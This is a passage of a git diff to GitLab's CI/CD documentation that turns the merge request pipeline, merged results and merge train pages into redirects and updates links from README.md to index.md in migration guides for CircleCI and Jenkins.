a/doc/ci/lint.md b/doc/ci/lint.md index 3888a750d6a..746638442a7 100644 --- a/doc/ci/lint.md +++ b/doc/ci/lint.md @@ -20,7 +20,7 @@ in your project and click **CI lint**. ## Validate basic logic and syntax By default, the CI lint checks the syntax of your CI YAML configuration and also runs -some basic logical validations. Configuration added with the [`includes` keyword](yaml/README.md#include), +some basic logical validations. Configuration added with the [`includes` keyword](yaml/index.md#include), is also validated. To use the CI lint, paste a complete CI configuration (`.gitlab-ci.yml` for example) diff --git a/doc/ci/merge_request_pipelines/img/merge_request.png b/doc/ci/merge_request_pipelines/img/merge_request.png Binary files differdeleted file mode 100644 index bb64e17cc91..00000000000 --- a/doc/ci/merge_request_pipelines/img/merge_request.png +++ /dev/null diff --git a/doc/ci/merge_request_pipelines/index.md b/doc/ci/merge_request_pipelines/index.md index 1866b40093a..c852800d0a9 100644 --- a/doc/ci/merge_request_pipelines/index.md +++ b/doc/ci/merge_request_pipelines/index.md @@ -1,237 +1,8 @@ --- -stage: Verify -group: Pipeline Execution -info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://about.gitlab.com/handbook/engineering/ux/technical-writing/#assignments -type: reference, index -last_update: 2019-07-03 +redirect_to: '../pipelines/merge_request_pipelines.md' --- -# Pipelines for Merge Requests +This document was moved to [another location](../pipelines/merge_request_pipelines.md). -> [Introduced](https://gitlab.com/gitlab-org/gitlab-foss/-/issues/15310) in GitLab 11.6. - -In a [basic configuration](../pipelines/pipeline_architectures.md#basic-pipelines), GitLab runs a pipeline each time -changes are pushed to a branch. - -If you want the pipeline to run jobs **only** on commits to a branch that is associated with a merge request, -you can use *pipelines for merge requests*. - -In the UI, these pipelines are labeled as `detached`. Otherwise, these pipelines appear the same -as other pipelines. - -Pipelines for merge requests can run when you: - -- Create a new merge request. -- Commit changes to the source branch for the merge request. -- Select the **Run pipeline** button from the **Pipelines** tab in the merge request. - -Any user who has developer [permissions](../../user/permissions.md) -can run a pipeline for merge requests. - - - -If you use this feature with [merge when pipeline succeeds](../../user/project/merge_requests/merge_when_pipeline_succeeds.md), -pipelines for merge requests take precedence over the other regular pipelines. - -## Prerequisites - -To enable pipelines for merge requests: - -- Your repository must be a GitLab repository, not an - [external repository](../ci_cd_for_external_repos/index.md). -- [In GitLab 11.10 and later](https://gitlab.com/gitlab-org/gitlab-foss/-/merge_requests/25504), - you must be using GitLab Runner 11.9. - -## Configuring pipelines for merge requests - -To configure pipelines for merge requests you need to configure your [CI/CD configuration file](../yaml/README.md). -There are a few different ways to do this: - -### Use `rules` to run pipelines for merge requests - -When using `rules`, which is the preferred method, we recommend starting with one -of the [`workflow:rules` templates](../yaml/README.md#workflowrules-templates) to ensure -your basic configuration is correct. Instructions on how to do this, as well as how -to customize, are available at that link. - -### Use `only` or `except` to run pipelines for merge requests - -If you want to continue using `only/except`, this is possible but please review the drawbacks -below. - -When you use this method, you have to specify `only: - merge_requests` for each job. In this -example, the pipeline contains a `test` job that is configured to run on merge requests. - -The `build` and `deploy` jobs don't have the `only: - merge_requests` keyword, -so they don't run on merge requests. - -```yaml -build: - stage: build - script: ./build - only: - - main - -test: - stage: test - script: ./test - only: - - merge_requests - -deploy: - stage: deploy - script: ./deploy - only: - - main -``` - -#### Excluding certain jobs - -The behavior of the `only: [merge_requests]` keyword is such that _only_ jobs with -that keyword are run in the context of a merge request; no other jobs run. - -However, you can invert this behavior and have all of your jobs run _except_ -for one or two. - -Consider the following pipeline, with jobs `A`, `B`, and `C`. Imagine you want: - -- All pipelines to always run `A` and `B`. -- `C` to run only for merge requests. - -To achieve this, you can configure your `.gitlab-ci.yml` file as follows: - -```yaml -.only-default: &only-default - only: - - main - - merge_requests - - tags - -A: - <<: *only-default - script: - - ... - -B: - <<: *only-default - script: - - ... - -C: - script: - - ... - only: - - merge_requests -``` - -Therefore: - -- Since `A` and `B` are getting the `only:` rule to execute in all cases, they always run. -- Since `C` specifies that it should only run for merge requests, it doesn't run for any pipeline - except a merge request pipeline. - -This helps you avoid having to add the `only:` rule to all of your jobs to make -them always run. You can use this format to set up a Review App, helping to -save resources. - -#### Excluding certain branches - -Pipelines for merge requests require special treatment when -using [`only`/`except`](../yaml/README.md#only--except). Unlike ordinary -branch refs (for example `refs/heads/my-feature-branch`), merge request refs -use a special Git reference that looks like `refs/merge-requests/:iid/head`. Because -of this, the following configuration will **not** work as expected: - -```yaml -# Does not exclude a branch named "docs-my-fix"! -test: - only: [merge_requests] - except: [/^docs-/] -``` - -Instead, you can use the -[`$CI_COMMIT_REF_NAME` predefined environment -variable](../variables/predefined_variables.md) in -combination with -[`only:variables`](../yaml/README.md#onlyvariables--exceptvariables) to -accomplish this behavior: - -```yaml -test: - only: [merge_requests] - except: - variables: - - $CI_COMMIT_REF_NAME =~ /^docs-/ -``` - -## Pipelines for Merged Results **(PREMIUM)** - -Read the [documentation on Pipelines for Merged Results](pipelines_for_merged_results/index.md). - -### Merge Trains **(PREMIUM)** - -Read the [documentation on Merge Trains](pipelines_for_merged_results/merge_trains/index.md). - -## Run pipelines in the parent project for merge requests from a forked project **(PREMIUM)** - -> - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/217451) in GitLab 13.3. -> - [Moved](https://about.gitlab.com/blog/2021/01/26/new-gitlab-product-subscription-model/) to GitLab Premium in 13.9. - -By default, external contributors working from forks can't create pipelines in the -parent project. When a pipeline for merge requests is triggered by a merge request -coming from a fork: - -- It's created and runs in the fork (source) project, not the parent (target) project. -- It uses the fork project's CI/CD configuration and resources. - -If a pipeline runs in a fork, the **fork** icon appears for the pipeline in the merge request. - - - -Sometimes parent project members want the pipeline to run in the parent -project. This could be to ensure that the post-merge pipeline passes in the parent project. -For example, a fork project could try to use a corrupted runner that doesn't execute -test scripts properly, but reports a passed pipeline. Reviewers in the parent project -could mistakenly trust the merge request because it passed a faked pipeline. - -Parent project members with at least [Developer permissions](../../user/permissions.md) -can create pipelines in the parent project for merge requests -from a forked project. In the merge request, go to the **Pipelines** and click -**Run pipeline** button. - -WARNING: -Fork merge requests could contain malicious code that tries to steal secrets in the -parent project when the pipeline runs, even before merge. Reviewers must carefully -check the changes in the merge request before triggering the pipeline. GitLab shows -a warning that must be accepted before the pipeline can be triggered. - -## Additional predefined variables - -By using pipelines for merge requests, GitLab exposes additional predefined variables to the pipeline jobs. -Those variables contain information of the associated merge request, so that it's useful -to integrate your job with [GitLab Merge Request API](../../api/merge_requests.md). - -You can find the list of available variables in [the reference sheet](../variables/predefined_variables.md). -The variable names begin with the `CI_MERGE_REQUEST_` prefix. - -## Troubleshooting - -### Two pipelines created when pushing to a merge request - -If you are experiencing duplicated pipelines when using `rules`, take a look at -the [important differences between `rules` and `only`/`except`](../jobs/job_control.md#avoid-duplicate-pipelines), -which helps you get your starting configuration correct. - -If you are seeing two pipelines when using `only/except`, please see the caveats -related to using `only/except` above (or, consider moving to `rules`). - -In [GitLab 13.7](https://gitlab.com/gitlab-org/gitlab/-/issues/201845) and later, -you can add `workflow:rules` to [switch from branch pipelines to merge request pipelines](../yaml/README.md#switch-between-branch-pipelines-and-merge-request-pipelines) -after a merge request is open on the branch. - -### Two pipelines created when pushing an invalid CI configuration file - -Pushing to a branch with an invalid CI configuration file can trigger -the creation of two types of failed pipelines. One pipeline is a failed merge request -pipeline, and the other is a failed branch pipeline, but both are caused by the same -invalid configuration. +<!-- This redirect file can be deleted after 2021-09-29. --> +<!-- Before deletion, see: https://docs.gitlab.com/ee/development/documentation/#move-or-rename-a-page --> diff --git a/doc/ci/merge_request_pipelines/pipelines_for_merged_results/index.md b/doc/ci/merge_request_pipelines/pipelines_for_merged_results/index.md index 552c007c70d..76a79ba1356 100644 --- a/doc/ci/merge_request_pipelines/pipelines_for_merged_results/index.md +++ b/doc/ci/merge_request_pipelines/pipelines_for_merged_results/index.md @@ -1,135 +1,8 @@ --- -stage: Verify -group: Pipeline Execution -info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://about.gitlab.com/handbook/engineering/ux/technical-writing/#assignments -type: reference -last_update: 2019-07-03 +redirect_to: '../../pipelines/pipelines_for_merged_results.md' --- -# Pipelines for Merged Results **(PREMIUM)** +This document was moved to [another location](../../pipelines/pipelines_for_merged_results.md). -> [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/7380) in [GitLab Premium](https://about.gitlab.com/pricing/) 11.10. - -When you submit a merge request, you are requesting to merge changes from a -source branch into a target branch. By default, the CI pipeline runs jobs -against the source branch. - -With *pipelines for merged results*, the pipeline runs as if the changes from -the source branch have already been merged into the target branch. The commit shown for the pipeline does not exist on the source or target branches but represents the combined target and source branches. - - - -If the pipeline fails due to a problem in the target branch, you can wait until the -target is fixed and re-run the pipeline. -This new pipeline runs as if the source is merged with the updated target, and you -don't need to rebase. - -The pipeline does not automatically run when the target branch changes. Only changes -to the source branch trigger a new pipeline. If a long time has passed since the last successful -pipeline, you may want to re-run it before merge, to ensure that the source changes -can still be successfully merged into the target. - -When the merge request can't be merged, the pipeline runs against the source branch only. For example, when: - -- The target branch has changes that conflict with the changes in the source branch. -- The merge request is a [**Draft** merge request](../../../user/project/merge_requests/drafts.md). - -In these cases, the pipeline runs as a [pipeline for merge requests](../index.md) -and is labeled as `detached`. If these cases no longer exist, new pipelines -again run against the merged results. - -Any user who has developer [permissions](../../../user/permissions.md) can run a -pipeline for merged results. - -## Prerequisites - -To enable pipelines for merge results: - -- You must have the [Maintainer role](../../../user/permissions.md). -- You must be using [GitLab Runner](https://gitlab.com/gitlab-org/gitlab-runner) 11.9 or later. -- You must not be using - [fast forward merges](../../../user/project/merge_requests/fast_forward_merge.md) yet. - To follow progress, see [#58226](https://gitlab.com/gitlab-org/gitlab/-/issues/26996). -- Your repository must be a GitLab repository, not an - [external repository](../../ci_cd_for_external_repos/index.md). - -## Enable pipelines for merged results - -To enable pipelines for merged results for your project: - -1. [Configure your CI/CD configuration file](../index.md#configuring-pipelines-for-merge-requests) - so that the pipeline or individual jobs run for merge requests. -1. Visit your project's **Settings > General** and expand **Merge requests**. -1. Check **Enable merged results pipelines**. -1. Click **Save changes**. - -WARNING: -If you select the check box but don't configure your CI/CD to use -pipelines for merge requests, your merge requests may become stuck in an -unresolved state or your pipelines may be dropped. - -## Using Merge Trains - -When you enable [Pipelines for merged results](#pipelines-for-merged-results), -GitLab [automatically displays](merge_trains/index.md#add-a-merge-request-to-a-merge-train) -a **Start/Add Merge Train button**. - -Generally, this is a safer option than merging merge requests immediately, because your -merge request is evaluated with an expected post-merge result before the actual -merge happens. - -For more information, read the [documentation on Merge Trains](merge_trains/index.md). - -## Automatic pipeline cancellation - -> [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/12996) in [GitLab Premium](https://about.gitlab.com/pricing/) 12.3. - -GitLab CI/CD can detect the presence of redundant pipelines, and cancels them -to conserve CI resources. - -When a user merges a merge request immediately within an ongoing merge -train, the train is reconstructed, because it recreates the expected -post-merge commit and pipeline. In this case, the merge train may already -have pipelines running against the previous expected post-merge commit. -These pipelines are considered redundant and are automatically -canceled. - -## Troubleshooting - -### Pipelines for merged results not created even with new change pushed to merge request - -Can be caused by some disabled feature flags. Please make sure that -the following feature flags are enabled on your GitLab instance: - -- `:merge_ref_auto_sync` - -To check and set these feature flag values, please ask an administrator to: - -1. Log into the Rails console of the GitLab instance: - - ```shell - sudo gitlab-rails console - ``` - -1. Check if the flags are enabled or not: - - ```ruby - Feature.enabled?(:merge_ref_auto_sync) - ``` - -1. If needed, enable the feature flags: - - ```ruby - Feature.enable(:merge_ref_auto_sync) - ``` - -### Intermittently pipelines fail by `fatal: reference is not a tree:` error - -Since pipelines for merged results are a run on a merge ref of a merge request -(`refs/merge-requests/<iid>/merge`), the Git reference could be overwritten at an -unexpected timing. For example, when a source or target branch is advanced. -In this case, the pipeline fails because of `fatal: reference is not a tree:` error, -which indicates that the checkout-SHA is not found in the merge ref. - -This behavior was improved at GitLab 12.4 by introducing [Persistent pipeline refs](../../troubleshooting.md#fatal-reference-is-not-a-tree-error). -You should be able to create pipelines at any timings without concerning the error. +<!-- This redirect file can be deleted after 2021-09-29. --> +<!-- Before deletion, see: https://docs.gitlab.com/ee/development/documentation/#move-or-rename-a-page --> diff --git a/doc/ci/merge_request_pipelines/pipelines_for_merged_results/merge_trains/index.md b/doc/ci/merge_request_pipelines/pipelines_for_merged_results/merge_trains/index.md index 7f237655593..8b2316fd340 100644 --- a/doc/ci/merge_request_pipelines/pipelines_for_merged_results/merge_trains/index.md +++ b/doc/ci/merge_request_pipelines/pipelines_for_merged_results/merge_trains/index.md @@ -1,236 +1,8 @@ --- -stage: Verify -group: Pipeline Execution -info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://about.gitlab.com/handbook/engineering/ux/technical-writing/#assignments -type: reference -last_update: 2019-07-03 +redirect_to: '../../../pipelines/merge_trains.md' --- -# Merge Trains **(PREMIUM)** +This document was moved to [another location](../../../pipelines/merge_trains.md). -> - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/9186) in [GitLab Premium](https://about.gitlab.com/pricing/) 12.0. -> - [Squash and merge](../../../../user/project/merge_requests/squash_and_merge.md) support [introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/13001) in [GitLab Premium](https://about.gitlab.com/pricing/) 12.6. - -For more information about why you might want to use Merge Trains, read [How merge trains keep your master green](https://about.gitlab.com/blog/2020/01/30/all-aboard-merge-trains/). - -When [pipelines for merged results](../index.md#pipelines-for-merged-results) are -enabled, the pipeline jobs run as if the changes from your source branch have already -been merged into the target branch. - -However, the target branch may be changing rapidly. When you're ready to merge, -if you haven't run the pipeline in a while, the target branch may have already changed. -Merging now could introduce breaking changes. - -*Merge trains* can prevent this from happening. A merge train is a queued list of merge -requests, each waiting to be merged into the target branch. - -Many merge requests can be added to the train. Each merge request runs its own merged results pipeline, -which includes the changes from all of the other merge requests in *front* of it on the train. -All the pipelines run in parallel, to save time. - -If the pipeline for a merge request fails, the breaking changes are not merged, and the target -branch is unaffected. The merge request is removed from the train, and all pipelines behind it restart. - -If the pipeline for the merge request at the front of the train completes successfully, -the changes are merged into the target branch, and the other pipelines continue to -run. - -To add a merge request to a merge train, you need [permissions](../../../../user/permissions.md) to push to the target branch. - -Each merge train can run a maximum of **twenty** pipelines in parallel. -If more than twenty merge requests are added to the merge train, the merge requests -are queued until a slot in the merge train is free. There is no limit to the -number of merge requests that can be queued. - -## Merge train example - -Three merge requests (`A`, `B` and `C`) are added to a merge train in order, which -creates three merged results pipelines that run in parallel: - -1. The first pipeline runs on the changes from `A` combined with the target branch. -1. The second pipeline runs on the changes from `A` and `B` combined with the target branch. -1. The third pipeline runs on the changes from `A`, `B`, and `C` combined with the target branch. - -If the pipeline for `B` fails, it is removed from the train. The pipeline for -`C` restarts with the `A` and `C` changes, but without the `B` changes. - -If `A` then completes successfully, it merges into the target branch, and `C` continues -to run. If more merge requests are added to the train, they now include the `A` -changes that are included in the target branch, and the `C` changes that are from -the merge request already in the train. - -Read more about [how merge trains keep your master green](https://about.gitlab.com/blog/2020/01/30/all-aboard-merge-trains/). - -<i class="fa fa-youtube-play youtube" aria-hidden="true"></i> -Watch this video for a demonstration on [how parallel execution -of Merge Trains can prevent commits from breaking the default -branch](https://www.youtube.com/watch?v=D4qCqXgZkHQ). - -## Prerequisites - -To enable merge trains: - -- You must have the [Maintainer role](../../../../user/permissions.md). -- You must be using [GitLab Runner](https://gitlab.com/gitlab-org/gitlab-runner) 11.9 or later. -- In GitLab 13.0 and later, you need [Redis](https://redis.io/) 5.0 or later. -- Your repository must be a GitLab repository, not an - [external repository](../../../ci_cd_for_external_repos/index.md). - -## Enable merge trains - -To enable merge trains for your project: - -1. If you are on a self-managed GitLab instance, ensure the [feature flag](#merge-trains-feature-flag) is set correctly. -1. [Configure your CI/CD configuration file](../../index.md#configuring-pipelines-for-merge-requests) - so that the pipeline or individual jobs run for merge requests. -1. Visit your project's **Settings > General** and expand **Merge requests**. -1. In the **Merge method** section, verify that **Merge commit** is selected. - You cannot use **Merge commit with semi-linear history** or **Fast-forward merge** with merge trains. -1. In the **Merge options** section, select **Enable merged results pipelines.** (if not already selected) and **Enable merge trains.** -1. Click **Save changes** - -In GitLab 13.5 and earlier, there is only one checkbox, named -**Enable merge trains and pipelines for merged results**. - -WARNING: -If you select the check box but don't configure your CI/CD to use -pipelines for merge requests, your merge requests may become stuck in an -unresolved state or your pipelines may be dropped. - -## Start a merge train - -To start a merge train: - -1. Visit a merge request. -1. Click the **Start merge train** button. - - - -Other merge requests can now be added to the train. - -## Add a merge request to a merge train - -To add a merge request to a merge train: - -1. Visit a merge request. -1. Click the **Add to merge train** button. - -If pipelines are already running for the merge request, you cannot add the merge request -to the train. Instead, you can schedule to add the merge request to a merge train **when the latest -pipeline succeeds**. - - - -## Remove a merge request from a merge train - -1. Visit a merge request. -1. Click the **Remove from merge train** button. - - - -If you want to add the merge request to a merge train again later, you can. - -## View a merge request's current position on the merge train - -After a merge request has been added to the merge train, the merge request's -current position is displayed under the pipeline widget: - - - -## Immediately merge a merge request with a merge train - -If you have a high-priority merge request (for example, a critical patch) that must -be merged urgently, you can bypass the merge train by using the **Merge Immediately** option. -This is the fastest option to get the change merged into the target branch. - - - -WARNING: -Each time you merge a merge request immediately, the current merge train -is recreated and all pipelines restart. - -## Troubleshooting - -### Merge request dropped from the merge train immediately - -If a merge request is not mergeable (for example, it's a draft merge request, there is a merge -conflict, etc.), your merge request is dropped from the merge train automatically. - -In these cases, the reason for dropping the merge request is in the **system notes**. - -To check the reason: - -1. Open the merge request that was dropped from the merge train. -1. Open the **Discussion** tab. -1. Find a system note that includes either: - - The text **... removed this merge request from the merge train because ...** - - **... aborted this merge request from the merge train because ...** - The reason is given in the text after the **because ...** phrase. - - - -### Merge When Pipeline Succeeds cannot be chosen - -[Merge When Pipeline Succeeds](../../../../user/project/merge_requests/merge_when_pipeline_succeeds.md) -is currently unavailable when Merge Trains are enabled. - -See [the related issue](https://gitlab.com/gitlab-org/gitlab/-/issues/12267) -for more information. - -### Merge Train Pipeline cannot be retried - -When a pipeline for merge trains fails the merge request is dropped from the train and the pipeline can't be retried. -Pipelines for merge trains run on the merged result of the changes in the merge request and -the changes from other merge requests already on the train. If the merge request is dropped from the train, -the merged result is out of date and the pipeline can't be retried. - -Instead, you should [add the merge request to the train](#add-a-merge-request-to-a-merge-train) -again, which triggers a new pipeline. - -### Unable to add to merge train with message "The pipeline for this merge request failed." - -Sometimes the **Start/Add to Merge Train** button is not available and the merge request says, -"The pipeline for this merge request failed. Please retry the job or push a new commit to fix the failure." - -This issue occurs when [**Pipelines must succeed**](../../../../user/project/merge_requests/merge_when_pipeline_succeeds.md#only-allow-merge-requests-to-be-merged-if-the-pipeline-succeeds) -is enabled in **Settings > General > Merge requests**. This option requires that you -run a new successful pipeline before you can re-add a merge request to a merge train. - -Merge trains ensure that each pipeline has succeeded before a merge happens, so -you can clear the **Pipelines must succeed** check box and keep -**Enable merge trains and pipelines for merged results** (merge trains) enabled. - -If you want to keep the **Pipelines must succeed** option enabled along with Merge -Trains, create a new pipeline for merged results when this error occurs: - -1. Go to the **Pipelines** tab and click **Run pipeline**. -1. Click **Start/Add to merge train when pipeline succeeds**. - -See [the related issue](https://gitlab.com/gitlab-org/gitlab/-/issues/35135) -for more information. - -### Merge Trains feature flag **(PREMIUM SELF)** - -In [GitLab 13.6 and later](https://gitlab.com/gitlab-org/gitlab/-/issues/244831), -you can [enable or disable merge trains in the project settings](#enable-merge-trains). - -In GitLab 13.5 and earlier, merge trains are automatically enabled when -[pipelines for merged results](../index.md#pipelines-for-merged-results) are enabled. -To use pipelines for merged results without using merge trains, you can enable a -[feature flag](../../../../user/feature_flags.md) that blocks the merge trains feature. - -[GitLab administrators with access to the GitLab Rails console](../../../../administration/feature_flags.md) -can enable the feature flag to disable merge trains: - -```ruby -Feature.enable(:disable_merge_trains) -``` - -After you enable this feature flag, all existing merge trains are cancelled and -the **Start/Add to Merge Train** button no longer appears in merge requests. - -To disable the feature flag, and enable merge trains again: - -```ruby -Feature.disable(:disable_merge_trains) -``` +<!-- This redirect file can be deleted after 2021-09-29. --> +<!-- Before deletion, see: https://docs.gitlab.com/ee/development/documentation/#move-or-rename-a-page --> diff --git a/doc/ci/metrics_reports.md b/doc/ci/metrics_reports.md index 47236668e89..0b0226f428a 100644 --- a/doc/ci/metrics_reports.md +++ b/doc/ci/metrics_reports.md @@ -37,7 +37,7 @@ For an MR, the values of these metrics from the feature branch are compared to t ## How to set it up -Add a job that creates a [metrics report](yaml/README.md#artifactsreportsmetrics) (default filename: `metrics.txt`). The file should conform to the [OpenMetrics](https://openmetrics.io/) format. +Add a job that creates a [metrics report](yaml/index.md#artifactsreportsmetrics) (default filename: `metrics.txt`). The file should conform to the [OpenMetrics](https://openmetrics.io/) format. For example: diff --git a/doc/ci/migration/circleci.md b/doc/ci/migration/circleci.md index eb5ed451778..968adf2e161 100644 --- a/doc/ci/migration/circleci.md +++ b/doc/ci/migration/circleci.md @@ -68,7 +68,7 @@ job1: ### Workflows -CircleCI determines the run order for jobs with `workflows`. This is also used to determine concurrent, sequential, scheduled, or manual runs. The equivalent function in GitLab CI/CD is called [stages](../yaml/README.md#stages). Jobs on the same stage run in parallel, and only run after previous stages complete. Execution of the next stage is skipped when a job fails by default, but this can be allowed to continue even [after a failed job](../yaml/README.md#allow_failure). +CircleCI determines the run order for jobs with `workflows`. This is also used to determine concurrent, sequential, scheduled, or manual runs. The equivalent function in GitLab CI/CD is called [stages](../yaml/index.md#stages). Jobs on the same stage run in parallel, and only run after previous stages complete. Execution of the next stage is skipped when a job fails by default, but this can be allowed to continue even [after a failed job](../yaml/index.md#allow_failure). See [the Pipeline Architecture Overview](../pipelines/pipeline_architectures.md) for guidance on different types of pipelines that you can use. Pipelines can be tailored to meet your needs, such as for a large complex project or a monorepo with independent defined components. @@ -140,7 +140,7 @@ job4: #### Scheduled run -GitLab CI/CD has an easy to use UI to [schedule pipelines](../pipelines/schedules.md). Also, [rules](../yaml/README.md#rules) can be used to determine if jobs should be included or excluded from a scheduled pipeline. +GitLab CI/CD has an easy to use UI to [schedule pipelines](../pipelines/schedules.md). Also, [rules](../yaml/index.md#rules) can be used to determine if jobs should be included or excluded from a scheduled pipeline. CircleCI example of a scheduled workflow: @@ -159,7 +159,7 @@ scheduled-workflow: - build ``` -Example of the same scheduled pipeline using [`rules`](../yaml/README.md#rules) in GitLab CI/CD: +Example of the same scheduled pipeline using [`rules`](../yaml/index.md#rules) in GitLab CI/CD: ```yaml job1: @@ -188,7 +188,7 @@ release-branch-workflow: - testing ``` -Example of the same workflow using [`when: manual`](../yaml/README.md#whenmanual) in GitLab CI/CD: +Example of the same workflow using [`when: manual`](../yaml/index.md#whenmanual) in GitLab CI/CD: ```yaml deploy_prod: @@ -200,7 +200,7 @@ deploy_prod: ### Filter job by branch -[Rules](../yaml/README.md#rules) are a mechanism to determine if the job runs for a specific branch. +[Rules](../yaml/index.md#rules) are a mechanism to determine if the job runs for a specific branch. CircleCI example of a job filtered by branch: @@ -265,7 +265,7 @@ test_async: ## Contexts and variables -CircleCI provides [Contexts](https://circleci.com/docs/2.0/contexts/) to securely pass environment variables across project pipelines. In GitLab, a [Group](../../user/group/index.md) can be created to assemble related projects together. At the group level, [CI/CD variables](../variables/README.md#add-a-cicd-variable-to-a-group) can be stored outside the individual projects, and securely passed into pipelines across multiple projects. +CircleCI provides [Contexts](https://circleci.com/docs/2.0/contexts/) to securely pass environment variables across project pipelines. In GitLab, a [Group](../../user/group/index.md) can be created to assemble related projects together. At the group level, [CI/CD variables](../variables/index.md#add-a-cicd-variable-to-a-group) can be stored outside the individual projects, and securely passed into pipelines across multiple projects. ## Orbs @@ -294,7 +294,7 @@ GitLab.com shared runners: ### Machine and specific build environments -[Tags](../yaml/README.md#tags) can be used to run jobs on different platforms, by telling GitLab which runners should run the jobs. +[Tags](../yaml/index.md#tags) can be used to run jobs on different platforms, by telling GitLab which runners should run the jobs. CircleCI example of a job running on a specific environment: diff --git a/doc/ci/migration/jenkins.md b/doc/ci/migration/jenkins.md index 812f1caa5d1..9f2115fa4a0 100644 --- a/doc/ci/migration/jenkins.md +++ b/doc/ci/migration/jenkins.md @@ -17,9 +17,9 @@ that were able to quickly complete this migration: 1. Start by reading the GitLab CI/CD [Quick Start Guide](../quick_start/index.md) and [important product differences](#important-product-differences). 1. Learn the importance of [managing the organizational transition](#managing-the-organizational-transition). -1. [Add runners](../runners/README.md) to your GitLab instance. +1. [Add runners](../runners/index.md) to your GitLab instance. 1. Educate and enable your developers to independently perform the following steps in their projects: - 1. Review the [Quick Start Guide](../quick_start/index.md) and [Pipeline Configuration Reference](../yaml/README.md). + 1. Review the [Quick Start Guide](../quick_start/index.md) and [Pipeline Configuration Reference](../yaml/index.md). 1. Use the [Jenkins Wrapper](#jenkinsfile-wrapper) to temporarily maintain fragile Jenkins jobs. 1. Migrate the build and CI jobs and configure them to show results directly in your merge requests. They can use [Auto DevOps](../../topics/autodevops/index.md) as a starting point, and [customize](../../topics/autodevops/customize.md) or [decompose](../../topics/autodevops/customize.md#using-components-of-auto-devops) the configuration as needed. 1. Add [Review Apps](../review_apps/index.md). @@ -71,45 +71,45 @@ If you are interested in helping GitLab test the wrapper, join our [public testi There are some high level differences between the products worth mentioning: - With GitLab you don't need a root `pipeline` keyword to wrap everything. -- The way pipelines are triggered and [trigger other pipelines](../yaml/README.md#trigger) +- The way pipelines are triggered and [trigger other pipelines](../yaml/index.md#trigger) is different than Jenkins. GitLab pipelines can be triggered: - on push - on [schedule](../pipelines/schedules.md) - from the [GitLab UI](../pipelines/index.md#run-a-pipeline-manually) - - by [API call](../triggers/README.md) - - by [webhook](../triggers/README.md#triggering-a-pipeline-from-a-webhook) + - by [API call](../triggers/index.md) + - by [webhook](../triggers/index.md#triggering-a-pipeline-from-a-webhook) - by [ChatOps](../chatops/index.md) - You can control which jobs run in which cases, depending on how they are triggered, - with the [`rules` syntax](../yaml/README.md#rules). + with the [`rules` syntax](../yaml/index.md#rules). - GitLab [pipeline scheduling concepts](../pipelines/schedules.md) are also different from Jenkins. -- You can reuse pipeline configurations using the [`include` keyword](../yaml/README.md#include) +- You can reuse pipeline configurations using the [`include` keyword](../yaml/index.md#include) and [templates](#templates). Your templates can be kept in a central repository (with different permissions), and then any project can use them. This central project could also contain scripts or other reusable code. -- You can also use the [`extends` keyword](../yaml/README.md#extends) to reuse configuration +- You can also use the [`extends` keyword](../yaml/index.md#extends) to reuse configuration within a single pipeline configuration. - All jobs within a single stage always run in parallel, and all stages run in sequence. We are planning to allow certain jobs to break this sequencing as needed with our [directed acyclic graph](https://gitlab.com/gitlab-org/gitlab-foss/-/issues/47063) feature. -- The [`parallel`](../yaml/README.md#parallel) keyword can automatically parallelize tasks, +- The [`parallel`](../yaml/index.md#parallel) keyword can automatically parallelize tasks, like tests that support parallelization. - Normally all jobs within a single stage run in parallel, and all stages run in sequence. There are different [pipeline architectures](../pipelines/pipeline_architectures.md) that allow you to change this behavior. -- The new [`rules` syntax](../yaml/README.md#rules) is the recommended method of +- The new [`rules` syntax](../yaml/index.md#rules) is the recommended method of controlling when different jobs run. It is more powerful than the `only/except` syntax. - One important difference is that jobs run independently of each other and have a fresh environment in each job. Passing artifacts between jobs is controlled using the - [`artifacts`](../yaml/README.md#artifacts) and [`dependencies`](../yaml/README.md#dependencies) + [`artifacts`](../yaml/index.md#artifacts) and [`dependencies`](../yaml/index.md#dependencies) keywords. When finished, use the planned [Workspaces](https://gitlab.com/gitlab-org/gitlab/-/issues/29265) feature to more easily persist a common workspace between serial jobs. - The `.gitlab-ci.yml` file is checked in to the root of your repository, much like a Jenkinsfile, but - is in the YAML format (see [complete reference](../yaml/README.md)) instead of a Groovy DSL. It's most + is in the YAML format (see [complete reference](../yaml/index.md)) instead of a Groovy DSL. It's most analogous to the declarative Jenkinsfile format. -- Manual approvals or gates can be set up as [`when:manual` jobs](../yaml/README.md#whenmanual). These can - also leverage [`protected environments`](../yaml/README.md#protecting-manual-jobs) +- Manual approvals or gates can be set up as [`when:manual` jobs](../yaml/index.md#whenmanual). These can + also leverage [`protected environments`](../yaml/index.md#protecting-manual-jobs) to control who is able to approve them. - GitLab comes with a [container registry](../../user/packages/container_registry/index.md), and we recommend using container images to set up your build environment. For example, set up one pipeline that builds your build environment @@ -122,7 +122,7 @@ There are some high level differences between the products worth mentioning: ## Agents vs. runners Both Jenkins agents and GitLab runners are the hosts that run jobs. To convert the -Jenkins agent, simply uninstall it and then [install and register the runner](../runners/README.md). +Jenkins agent, simply uninstall it and then [install and register the runner](../runners/index.md). Runners do not require much overhead, so you can size them similarly to the Jenkins agents you were using. @@ -137,7 +137,7 @@ There are some important differences in the way runners work in comparison to ag Use autoscaling to provision runners only when needed, and scale down when not needed. This is similar to ephemeral agents in Jenkins. -If you are using `gitlab.com`, you can take advantage of our [shared runner fleet](../runners/README.md) +If you are using `gitlab.com`, you can take advantage of our [shared runner fleet](../runners/index.md) to run jobs without provisioning your own runners. We are investigating making them [available for self-managed instances](https://gitlab.com/groups/gitlab-org/-/epics/835) as well. @@ -154,8 +154,8 @@ and manage. That said, we do of course still value DRY (don't repeat yourself) principles and want to ensure that behaviors of your jobs can be codified once and applied as needed. You can use the `extends:` syntax to -[reuse configuration in your jobs](../yaml/README.md#extends), and `include:` can -be used to [reuse pipeline configurations](../yaml/README.md#include) in pipelines +[reuse configuration in your jobs](../yaml/index.md#extends), and `include:` can +be used to [reuse pipeline configurations](../yaml/index.md#include) in pipelines in different projects: ```yaml @@ -199,7 +199,7 @@ GitLab takes advantage of our connected ecosystem to automatically pull these ki your Merge Requests, pipeline details pages, and other locations. You may find that you actually don't need 